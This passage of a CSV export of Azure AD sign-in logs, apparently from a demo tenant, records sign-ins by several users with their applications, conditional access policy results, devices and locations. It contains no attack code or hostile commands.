'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",b20b8c5e-eadd-42f0-9472-7de6198f1d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,b20b8c5e-eadd-42f0-9472-7de6198f1d00,SigninLogs,Sucess,33.7984581,-84.38828278
+579,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:02.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,36984fc4-432e-438a-a52c-1b5f8881caad,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d6103972-d51f-4bff-802b-f4406fb61d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,d6103972-d51f-4bff-802b-f4406fb61d00,SigninLogs,Sucess,33.45851135,-82.21336365
+580,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:58.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e8cea29e-cd56-469d-94fc-70e06885980f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",973ebc26-a5be-4a53-afb2-eb0875e41b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,973ebc26-a5be-4a53-afb2-eb0875e41b00,SigninLogs,Sucess,33.7984581,-84.38828278
+581,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:43.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a0cb2560-9719-4aea-a81f-b5dfdc498ff2,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 09:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",dcc7c5bf-deb1-42c1-bd06-03c5fdc81400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,dcc7c5bf-deb1-42c1-bd06-03c5fdc81400,SigninLogs,Sucess,50.6406517,5.572050095
+582,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:44.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d75a1c7c-f644-4a2d-bfb0-9132d57b7189,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",a26127b0-0de6-4c21-8918-00e61a800000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,a26127b0-0de6-4c21-8918-00e61a800000,SigninLogs,Sucess,32.32146072,34.85319901
+583,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:38.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,097c6a3b-87f5-489b-9a5c-049320f7a2ac,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:37,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Edge 80.0.361', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",0fc515f1-f001-4d66-8b48-172bf58d0100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,0fc515f1-f001-4d66-8b48-172bf58d0100,SigninLogs,Sucess,32.32146072,34.85319901
+584,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:59.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,61b059cd-3bf3-41d9-839e-bd11ea500d87,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",b6b1e129-7976-4148-98ee-f605c5871c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b6b1e129-7976-4148-98ee-f605c5871c00,SigninLogs,Sucess,33.7984581,-84.38828278
+585,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:40.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85e19a3d-1957-402d-b065-5ac169e5ca6d,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:26,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Edge 80.0.361', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",1fad1a23-2a26-433c-9fe1-043500ec0000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,1fad1a23-2a26-433c-9fe1-043500ec0000,SigninLogs,Sucess,32.32146072,34.85319901
+586,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:52.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2b23479f-40e9-0000-54e6-7dc069265c0a,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 